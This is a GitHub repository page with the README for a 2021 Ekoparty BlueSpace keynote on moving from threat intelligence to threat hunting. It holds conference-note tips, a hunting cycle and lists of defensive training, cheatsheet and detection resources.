https://github.com/ch33r10/BlueSpace2021
Ekoparty's BlueSpace Keynote November 2021. Shoutout to @plugxor Muchas Gracias!!!
https://github.com/ch33r10/BlueSpace2021
cti cyber-threat-hunting cyber-threat-intelligence hunt hunting threat-hunting threat-intel threat-intelligence
Last synced: 19 days ago
JSON representation
Ekoparty's BlueSpace Keynote November 2021. Shoutout to @plugxor Muchas Gracias!!!
- Host: GitHub
- URL: https://github.com/ch33r10/BlueSpace2021
- Owner: ch33r10
- License: mit
- Created: 2021-09-22T03:51:43.000Z (over 4 years ago)
- Default Branch: main
- Last Pushed: 2023-06-05T03:06:43.000Z (almost 3 years ago)
- Last Synced: 2024-01-29T09:42:41.866Z (about 2 years ago)
- Topics: cti, cyber-threat-hunting, cyber-threat-intelligence, hunt, hunting, threat-hunting, threat-intel, threat-intelligence
- Homepage:
- Size: 12.8 MB
- Stars: 12
- Watchers: 1
- Forks: 2
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-csirt - Paint it, Blue - Transitionin from CTI to HUNT
README
# [](https://sites.google.com/view/ch33r10/me)
PAINT IT, BLUE Slides - Link
Pro Tips on transitioning from CTI to Hunt
πΈRESEARCH
π₯GOAL = ASK BETTER QUESTIONS
**SOCIAL MEDIA & MORE**|**SANS**|**WORKSHOPS / TALKS**|**DISCORDS / SLACKS**
---|---|---|---
#HuntingTipOfTheDay, Follow Threat Hunting Accounts EVERYWHERE - Link|Reading Room - Link, Webcasts - Link & Threat Hunting Summit|Prioritize Threat Hunting Talks/Workshops & take a look at YouTube|Join Slack/Discord related to infosec (BlueSpace has a Discord Channel - Link)
πCH33R10'S TALK NOTES EXAMPLE
I have a folder where I create a document for each conference.
I list the name of the talk or workshop and while watching I will take screenshots, if it is allowed, of the slides and make notes that I can reference later. Any words in the slides that I want to makes sure are searchable, I will type the keywords below the slides. I grab whatever links the speaker(s) share that I can. I make sure to highlight my personal takeaways or takeaways that I feel could be valuable for someone else. I make a point to include things I am curious about regardless of how weird/off-the-wall/impractical my questions/thoughts may be.
TEXAS CYBER SUMMIT 2021
- Becoming a Threat Hunter: This Is One Way by Jason Wood - Link
- LINKS
- Crowdstrike Global Threat Report 2021 - Link
- Crowdstrike Threat Hunting Report 2021 - Link
- Detection Lab by Chris Long - Link
- TALK TAKEAWAYS
- Document your Practice
- Record videos and publish them
- Write up your learning experience
- Give a conference presentation
- Document how you hunt at work
- Don't publish external. Keep it inside your employer
- Benefits of documenting
- Helps you talk about it in interviews
- Can talk about how you've applied it at work
- Ch33r10's RANDOM THOUGHTS & QUESTIONS
- I wonder if it is possible to use Chris Long's Detection Lab with the tools shared in the Busting the Ghost in the Logs talk by Randy Pargman & Jean-Francois Maes during Texas Cyber Summit 2021 - Link
- I wonder how Chris Long's Detection Lab compares with Splunk's Attack Range
- I wonder how I can take my threat hunting practice to the next level and make my practice more organization relevant, such as tooling, telemetry, honeypots? etc
- I wonder if it is possible to obtain a researcher/academic license for [your organization's EDR solution/a popular EDR solution] and build a custom tailored threat hunting lab
- For organizations that do not use Sysmon/Windows Events, how can I build threat hunting experience?
- ETC
- WHAT WOULD THIS BADNESS LOOK LIKE?
- WHERE WOULD I FIND IT?
-
HOW DO I DO THE NEEDFUL? (What's that search gonna look like?) -
RESEARCH - Hypothesis generation and understanding the technical details. -
ANALYSIS - Collect the necessary data, create searches, run the searches, and analyze the results. -
CONCLUSIONS - Findings, mitigations, documentation, lessons learned. -
DETECTIONS - Automate the Hunts you can. - RINSE & REPEAT
-
THREAT HUNT TYPE
-
STRUCTURED: Known TTPs, IOCs, Artifacts
-
-
UNSTRUCTURED: Unknown -
INTERNAL vs. EXTERNAL
- Example: Cobalt Strike Beacon Hunting in Network vs. ITW (In the Wild)
- Malware Archaeology Cheatsheets - Windows - Link 1, Link 2, Back up copy for Link 2 - Link 3
- Olaf Hartong. Sysmon Cheatsheet - Link
- SANS Hunt Evil Poster - Link
- SANS Intrusion Discovery for Windows Cheatsheet - Link
- BlueTeamLabs - Azure Sentinel Hunting Resource - Link
- David J. Bianco. Threat Hunting Project - Threat Hunts - Link
- Detection Ideas Repo by Vadim Khrykov @BlackMatter23 - Link
- Hurricane Labs - Threat Hunting with Splunk: Part 2, Process Creation Log Analysis - Link
- Roberto Rodriquez. ThreatHunter Playbook - Link
- Sigma Rules - Link
- Splunk - Advanced Threat Detection and Response - Link
- YARA Rules Resource - Link
- BLOG: BC Security Offensive Security Tools - Link
- BLOG: Red Canary - Link
- BLOG: SCYTHE Threat Thursday - Link
- BLOG: SpecterOps - Link
- Ch33r10's PURPLE TEAM EXERCISE IDEA QUEUE W/ THREAT HUNTING SUGGESTIONS - Link
- Ch33r10's Twitter Threat Hunting List - Link
- C2 Matrix by Jorge Orchilles, Bryson Bort & Adam Mashinchi - Link
- C2 Matrix Slingshot VM with C2s Pre-Installed + VECTR by SANS Institute - Link
- DEMO: C2 Matrix VM Walkthru with Jorge Orchilles - Link
- David J. Bianco and Cat Self. SANS Threat Hunting & IR Europe Summit 2020 - Link
- David J. Bianco. Sqrrl Archive - Link
- David J. Bianco. The Pyramid of Pain - Link
- David J. Bianco. The Threat Hunt Project - Analysis Environment - Link
- David J. Bianco. The ThreatHunting Project - Recommended Reading List - Link
- Digit Oktavianto. Cyber Threat Hunting Workshop - Link
- iRed Team - Link
- Jason Wood. Becoming a Threat Hunter: This Is One Way - Texas Cyber Summit 2021 - Link
- Jennifer Gruener. DIY Splunk - Link
- Joshua Stevens. Hunting for the Undefined Threat: Advanced Analytics & Visualization. RSA Conference 2015 - Link
- Matt Bromiley. Thinking like a Hunter: Implementing a Threat Hunting Program. SANS Analyst Paper - Link
- MITRE ENGENUITY - ATT&CK Evaluations - Link
- Robert M. Lee and David J. Bianco. Generating Hypotheses for Successful Threat Hunting. SANS Analyst White Paper - Link
- Roberto Rodriguez. How Hot is your Hunt Team? - Link
- Splunk - Threat Hunting with Splunk: The Basics - Link
- Sqrrl. A Framework for Cyber Threat Hunting - Link 1 & Backup copy for Link 1 Link 2
- The DFIR Report - Link
- Valentina Costa-Gazcon. Practical Threat Intelligence and Data-Driven Threat Hunting - Link
- Questions for Infosec Job Twitter Thread - Link
- Questions to Find RED FLAGS at a Company Twitter Thread - Link
- Questions to Prepare for Trait-based Interview Questions Twitter Thread - Link
- SANS THREAT HUNTING PLAYLIST㪠- Link
- SANS THREAT HUNTING SUMMIT 2021 Links from the chats collected by Cassie @DFIRDetective - Link
- SANS THREAT HUNTING SUMMIT 2020πΏ - Link
- SANS THREAT HUNTING & INCIDENT RESPONSE SUMMIT 2019π½οΈ - Link
- SANS THREAT HUNTING & INCIDENT RESPONSE SUMMIT 2018π« - Link
- SANS THREAT HUNTING & INCIDENT RESPONSE SUMMIT 2017π¬ - Link
- Active Countermeasures - Cyber Threat Hunting Training - Cost: FREE - Link
- Applied Network Defense - Practical Threat Hunting - Cost: π² - Link
- BlueTeamLabsOnline - Cost: π² - Link
- CyberDefenders - Windows Threat Hunting and others - Cost: FREE & π² - Link
- Detection Lab by Chris Long - Cost: FREE - Link
- INE elearnsecurity - Threat Hunting - Cost: π² - Link
- Mosse Institute - Certified Threat Hunter - Cost: π² - Link
- SANS FOR508 Advanced Incident Response, Threat Hunting, and Digital Forensics - Cost: π² - Link
- Splunk Attack Range - Cost: FREE - Link
- Splunk's Boss of the SOC (BOTS) - Cost: FREE - BOTS v1, BOTS v2, BOTS v3
- Splunk Workshops - Cost: FREE - Link
I took a screenshot of Jason Wood's slide for my personal notes that I retyped below. These are his words on the slide that I duplicated. All credit for the words on the slide goes to Jason Wood. This duplication is for educational purposes.
π€PRACTICE
π΅GOAL = PREPARATION
**TRAININGS / HANDS-ON**|**GIVE A TALK**|**HUNT HYPOTHESIS DEV**|**WORK PROJECTS**
---|---|---|---
Boss of the SOC (BOTS) - BOTS v1, BOTS v2, BOTS v3, ATTACK Range - Link, SPLUNK, .conf Talks, SPLUNK Workshops|Talk about something HUNT adjacent|Read Threat Reports & Think about how YOU would HUNT it, Understand the Technical Attack Chain|Volunteer to work SOC tickets, Volunteer to prep CTI reports for HUNT/PURPLE
βοΈCH33R10'S HUNT HYPOTHESIS DEV
π»APPLY
πΉGOAL = APPLICATION
**MITRE ATT&CK TECHNIQUES**|**CISA / PUBLIC THREAT REPORTS**|**INFOSEC CURRENT EVENTS**
---|---|---
Pick a few and be able to explain them in DETAIL - MITRE ATT&CK|Develop Hunt Hypotheses with a minimum of 1 hour of content to discuss|Develop hunt scenarios & understand the technical attack chain
πCH33R10'S THREAT HUNTING CYCLE
π‘οΈCH33R10'S THREAT HUNTING TIPS
πLEARNING RESOURCES
πCHEATSHEETS
πDETECTIONS/HUNTS
πΉGENERAL INFO
π€INTERVIEW RESOURCES
πΊSANS THREAT HUNTING
ποΈTRAINING
πTHANK YOU
Thank you to BlueSpace and Ekoparty! <3
Shoutout to @plugxor Muchas Gracias!